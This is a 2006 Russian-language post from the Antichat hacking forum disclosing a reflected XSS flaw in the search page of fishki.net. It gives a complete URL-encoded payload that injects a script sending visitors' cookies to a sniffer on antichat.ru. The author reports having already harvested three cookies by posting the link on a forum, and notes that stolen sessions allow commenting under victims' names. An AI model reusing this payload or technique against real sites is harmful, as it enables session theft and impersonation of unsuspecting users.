ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу xss на www.fishki.net
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

xss на www.fishki.net
  #1  
Старый 25.03.2006, 17:17
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию xss на www.fishki.net
Пассивная XSS в поиске на популярном сайте _www.fishki.net:
если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Imag e%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru %2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript %3E
То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss в Nm Gho_st E-Mail 1 17.03.2006 21:10
XSS на whitep.net •••™NO FEAR™••• Уязвимости 3 07.03.2006 17:35
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52
Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки? virgoz Форумы 2 02.01.2005 22:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ